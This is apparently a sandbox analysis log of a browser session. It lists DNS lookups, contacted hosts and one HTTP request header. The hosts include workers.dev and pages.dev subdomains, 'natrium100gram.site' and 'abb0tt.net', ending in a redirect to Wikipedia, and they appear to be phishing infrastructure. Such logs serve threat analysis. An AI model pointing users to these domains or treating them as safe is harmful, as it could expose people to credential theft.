                                                                                                                                                                                                                                      Jan 7, 2025 18:52:25.267946005 CET5388753192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:25.268107891 CET5422853192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:25.269368887 CET6434853192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:25.269548893 CET6353353192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:25.279098034 CET53542281.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:25.279526949 CET53538871.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:25.282597065 CET53635331.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:25.307332993 CET53643481.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:26.518537045 CET6186753192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:26.518728018 CET6302753192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:26.525439978 CET53618671.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:26.525453091 CET53630271.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.028155088 CET4929353192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.028368950 CET5683753192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.035351038 CET53492931.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.035476923 CET53568371.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.289890051 CET5749753192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.290046930 CET5368453192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.296819925 CET53536841.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.297082901 CET53574971.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.502274036 CET6037553192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.502424955 CET5312753192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.513796091 CET53603751.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.514343977 CET53531271.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:28.307332993 CET4934553192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:28.307666063 CET6408253192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:28.650063992 CET53640821.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:28.656378031 CET53493451.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:30.370765924 CET5923653192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:30.372673035 CET5210153192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:30.372673035 CET6101653192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:30.372859955 CET6081753192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:30.381616116 CET53592361.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:30.384407043 CET53521011.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:30.706599951 CET53610161.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:30.724284887 CET53608171.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:32.190440893 CET5458653192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:32.190651894 CET5078053192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:32.197362900 CET53507801.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:32.197673082 CET53545861.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:33.553836107 CET5718153192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:33.554014921 CET5881553192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:33.560538054 CET53571811.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:33.560698032 CET53588151.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:33.561878920 CET5639253192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:33.562022924 CET4961253192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:33.569406986 CET53563921.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:33.571758032 CET53496121.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:40.338035107 CET53604851.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:49.087052107 CET5205953192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:49.087644100 CET5658053192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:49.094054937 CET53520591.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:49.094614983 CET53565801.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:49.761173964 CET5731553192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:49.761364937 CET4960253192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:49.767847061 CET53573151.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:49.768693924 CET53496021.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:50.777734041 CET6253053192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:50.777872086 CET5852353192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:50.778384924 CET5374053192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:50.778625011 CET6273453192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:50.784662962 CET53625301.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:50.785012007 CET53537401.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:50.785336018 CET53585231.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:50.785707951 CET53627341.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:51.638245106 CET5853553192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:51.638365984 CET5002853192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:51.644901991 CET53585351.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:51.645241976 CET53500281.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:51.732017994 CET53544021.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:51.845187902 CET6024453192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:51.845365047 CET6146753192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:51.852365971 CET53602441.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:51.852854013 CET53614671.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.073038101 CET6427053192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.073180914 CET6032153192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.079850912 CET53603211.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.079857111 CET53642701.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.050708055 CET6001753192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.050857067 CET6065753192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.057538033 CET53600171.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.057851076 CET53606571.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:59.046703100 CET53598341.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:21.918543100 CET53586071.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:22.221050024 CET53581921.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:28.100100040 CET138138192.168.2.16192.168.2.255
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:51.488215923 CET53590431.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:52.047940016 CET53584361.1.1.1192.168.2.16
                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:22.478548050 CET192.168.2.161.1.1.10x1988Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:22.478894949 CET192.168.2.161.1.1.10xa649Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:23.119514942 CET192.168.2.161.1.1.10xae12Standard query (0)tiny-hat-eab8.pagenew.workers.devA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:23.119745016 CET192.168.2.161.1.1.10xda15Standard query (0)tiny-hat-eab8.pagenew.workers.dev65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:23.120508909 CET192.168.2.161.1.1.10x9e09Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:23.120691061 CET192.168.2.161.1.1.10xe43Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:25.267946005 CET192.168.2.161.1.1.10x25bbStandard query (0)porposal-ach.pages.devA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:25.268107891 CET192.168.2.161.1.1.10x8fe5Standard query (0)porposal-ach.pages.dev65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:25.269368887 CET192.168.2.161.1.1.10xf7cStandard query (0)tiny-hat-eab8.pagenew.workers.devA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:25.269548893 CET192.168.2.161.1.1.10x301eStandard query (0)tiny-hat-eab8.pagenew.workers.dev65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:26.518537045 CET192.168.2.161.1.1.10x6da4Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:26.518728018 CET192.168.2.161.1.1.10x841dStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.028155088 CET192.168.2.161.1.1.10x7eacStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.028368950 CET192.168.2.161.1.1.10x68f5Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.289890051 CET192.168.2.161.1.1.10x22a3Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.290046930 CET192.168.2.161.1.1.10xc515Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.502274036 CET192.168.2.161.1.1.10x48b2Standard query (0)porposal-ach.pages.devA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.502424955 CET192.168.2.161.1.1.10x1e5fStandard query (0)porposal-ach.pages.dev65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:28.307332993 CET192.168.2.161.1.1.10x4ed6Standard query (0)natrium100gram.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:28.307666063 CET192.168.2.161.1.1.10x9c35Standard query (0)natrium100gram.site65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:30.370765924 CET192.168.2.161.1.1.10xeb5dStandard query (0)abb0tt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:30.372673035 CET192.168.2.161.1.1.10x146Standard query (0)abb0tt.net65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:30.372673035 CET192.168.2.161.1.1.10x3200Standard query (0)natrium100gram.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:30.372859955 CET192.168.2.161.1.1.10x67cStandard query (0)natrium100gram.site65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:32.190440893 CET192.168.2.161.1.1.10x7a2Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:32.190651894 CET192.168.2.161.1.1.10xc45cStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:33.553836107 CET192.168.2.161.1.1.10xdf3dStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:33.554014921 CET192.168.2.161.1.1.10x474fStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:33.561878920 CET192.168.2.161.1.1.10x3ac1Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:33.562022924 CET192.168.2.161.1.1.10x64bbStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:49.087052107 CET192.168.2.161.1.1.10x82dcStandard query (0)href.liA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:49.087644100 CET192.168.2.161.1.1.10x670bStandard query (0)href.li65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:49.761173964 CET192.168.2.161.1.1.10x648eStandard query (0)en.wikipedia.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:49.761364937 CET192.168.2.161.1.1.10x9b01Standard query (0)en.wikipedia.org65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:50.777734041 CET192.168.2.161.1.1.10x848eStandard query (0)upload.wikimedia.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:50.777872086 CET192.168.2.161.1.1.10xca7cStandard query (0)upload.wikimedia.org65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:50.778384924 CET192.168.2.161.1.1.10xd563Standard query (0)meta.wikimedia.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:50.778625011 CET192.168.2.161.1.1.10x79faStandard query (0)meta.wikimedia.org65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:51.638245106 CET192.168.2.161.1.1.10x9f38Standard query (0)en.wikipedia.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:51.638365984 CET192.168.2.161.1.1.10xd330Standard query (0)en.wikipedia.org65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:51.845187902 CET192.168.2.161.1.1.10xc49fStandard query (0)upload.wikimedia.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:51.845365047 CET192.168.2.161.1.1.10xac5cStandard query (0)upload.wikimedia.org65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.073038101 CET192.168.2.161.1.1.10x8ffStandard query (0)login.wikimedia.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.073180914 CET192.168.2.161.1.1.10x5307Standard query (0)login.wikimedia.org65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.050708055 CET192.168.2.161.1.1.10xddb2Standard query (0)login.wikimedia.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.050857067 CET192.168.2.161.1.1.10xf83Standard query (0)login.wikimedia.org65IN (0x0001)false
                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:22.485621929 CET1.1.1.1192.168.2.160xa649No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:22.486227036 CET1.1.1.1192.168.2.160x1988No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:23.127264977 CET1.1.1.1192.168.2.160xe43No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:23.127317905 CET1.1.1.1192.168.2.160x9e09No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:23.131350994 CET1.1.1.1192.168.2.160xda15No error (0)tiny-hat-eab8.pagenew.workers.dev65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:23.131611109 CET1.1.1.1192.168.2.160xae12No error (0)tiny-hat-eab8.pagenew.workers.dev188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:23.131611109 CET1.1.1.1192.168.2.160xae12No error (0)tiny-hat-eab8.pagenew.workers.dev188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:25.279098034 CET1.1.1.1192.168.2.160x8fe5No error (0)porposal-ach.pages.dev65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:25.279526949 CET1.1.1.1192.168.2.160x25bbNo error (0)porposal-ach.pages.dev172.66.47.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:25.279526949 CET1.1.1.1192.168.2.160x25bbNo error (0)porposal-ach.pages.dev172.66.44.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:25.282597065 CET1.1.1.1192.168.2.160x301eNo error (0)tiny-hat-eab8.pagenew.workers.dev65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:25.307332993 CET1.1.1.1192.168.2.160xf7cNo error (0)tiny-hat-eab8.pagenew.workers.dev188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:25.307332993 CET1.1.1.1192.168.2.160xf7cNo error (0)tiny-hat-eab8.pagenew.workers.dev188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:26.525439978 CET1.1.1.1192.168.2.160x6da4No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:26.525439978 CET1.1.1.1192.168.2.160x6da4No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:26.525439978 CET1.1.1.1192.168.2.160x6da4No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:26.525439978 CET1.1.1.1192.168.2.160x6da4No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.035351038 CET1.1.1.1192.168.2.160x7eacNo error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.035476923 CET1.1.1.1192.168.2.160x68f5No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.297082901 CET1.1.1.1192.168.2.160x22a3No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.297082901 CET1.1.1.1192.168.2.160x22a3No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.297082901 CET1.1.1.1192.168.2.160x22a3No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.297082901 CET1.1.1.1192.168.2.160x22a3No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.513796091 CET1.1.1.1192.168.2.160x48b2No error (0)porposal-ach.pages.dev172.66.47.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.513796091 CET1.1.1.1192.168.2.160x48b2No error (0)porposal-ach.pages.dev172.66.44.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:27.514343977 CET1.1.1.1192.168.2.160x1e5fNo error (0)porposal-ach.pages.dev65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:28.656378031 CET1.1.1.1192.168.2.160x4ed6No error (0)natrium100gram.site194.163.42.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:30.381616116 CET1.1.1.1192.168.2.160xeb5dNo error (0)abb0tt.net165.140.202.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:30.706599951 CET1.1.1.1192.168.2.160x3200No error (0)natrium100gram.site194.163.42.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:32.197362900 CET1.1.1.1192.168.2.160xc45cNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:32.197673082 CET1.1.1.1192.168.2.160x7a2No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:32.197673082 CET1.1.1.1192.168.2.160x7a2No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:33.560538054 CET1.1.1.1192.168.2.160xdf3dNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:33.560538054 CET1.1.1.1192.168.2.160xdf3dNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:33.560698032 CET1.1.1.1192.168.2.160x474fNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:33.569406986 CET1.1.1.1192.168.2.160x3ac1No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:33.569406986 CET1.1.1.1192.168.2.160x3ac1No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:33.571758032 CET1.1.1.1192.168.2.160x64bbNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:49.094054937 CET1.1.1.1192.168.2.160x82dcNo error (0)href.li192.0.78.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:49.094054937 CET1.1.1.1192.168.2.160x82dcNo error (0)href.li192.0.78.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:49.767847061 CET1.1.1.1192.168.2.160x648eNo error (0)en.wikipedia.orgdyna.wikimedia.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:49.767847061 CET1.1.1.1192.168.2.160x648eNo error (0)dyna.wikimedia.org185.15.59.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:49.768693924 CET1.1.1.1192.168.2.160x9b01No error (0)en.wikipedia.orgdyna.wikimedia.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:50.784662962 CET1.1.1.1192.168.2.160x848eNo error (0)upload.wikimedia.org185.15.59.240A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:50.785012007 CET1.1.1.1192.168.2.160xd563No error (0)meta.wikimedia.orgdyna.wikimedia.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:50.785012007 CET1.1.1.1192.168.2.160xd563No error (0)dyna.wikimedia.org185.15.59.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:50.785707951 CET1.1.1.1192.168.2.160x79faNo error (0)meta.wikimedia.orgdyna.wikimedia.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:51.644901991 CET1.1.1.1192.168.2.160x9f38No error (0)en.wikipedia.orgdyna.wikimedia.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:51.644901991 CET1.1.1.1192.168.2.160x9f38No error (0)dyna.wikimedia.org185.15.59.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:51.645241976 CET1.1.1.1192.168.2.160xd330No error (0)en.wikipedia.orgdyna.wikimedia.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:51.852365971 CET1.1.1.1192.168.2.160xc49fNo error (0)upload.wikimedia.org185.15.59.240A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.079850912 CET1.1.1.1192.168.2.160x5307No error (0)login.wikimedia.orgdyna.wikimedia.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.079857111 CET1.1.1.1192.168.2.160x8ffNo error (0)login.wikimedia.orgdyna.wikimedia.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:55.079857111 CET1.1.1.1192.168.2.160x8ffNo error (0)dyna.wikimedia.org185.15.59.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.057538033 CET1.1.1.1192.168.2.160xddb2No error (0)login.wikimedia.orgdyna.wikimedia.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.057538033 CET1.1.1.1192.168.2.160xddb2No error (0)dyna.wikimedia.org185.15.59.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:56.057851076 CET1.1.1.1192.168.2.160xf83No error (0)login.wikimedia.orgdyna.wikimedia.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      • tiny-hat-eab8.pagenew.workers.dev
                                                                                                                                                                                                                                      • porposal-ach.pages.dev
                                                                                                                                                                                                                                      • https:
                                                                                                                                                                                                                                        • code.jquery.com
                                                                                                                                                                                                                                        • natrium100gram.site
                                                                                                                                                                                                                                        • abb0tt.net
                                                                                                                                                                                                                                        • challenges.cloudflare.com
                                                                                                                                                                                                                                        • href.li
                                                                                                                                                                                                                                        • en.wikipedia.org
                                                                                                                                                                                                                                        • upload.wikimedia.org
                                                                                                                                                                                                                                        • login.wikimedia.org
                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      0192.168.2.1649713188.114.96.34436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:24 UTC507OUTGET / HTTP/1.1
                                                                                                                                                                                                                                      Host: tiny-hat-eab8.pagenew.workers.dev
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Origin: null
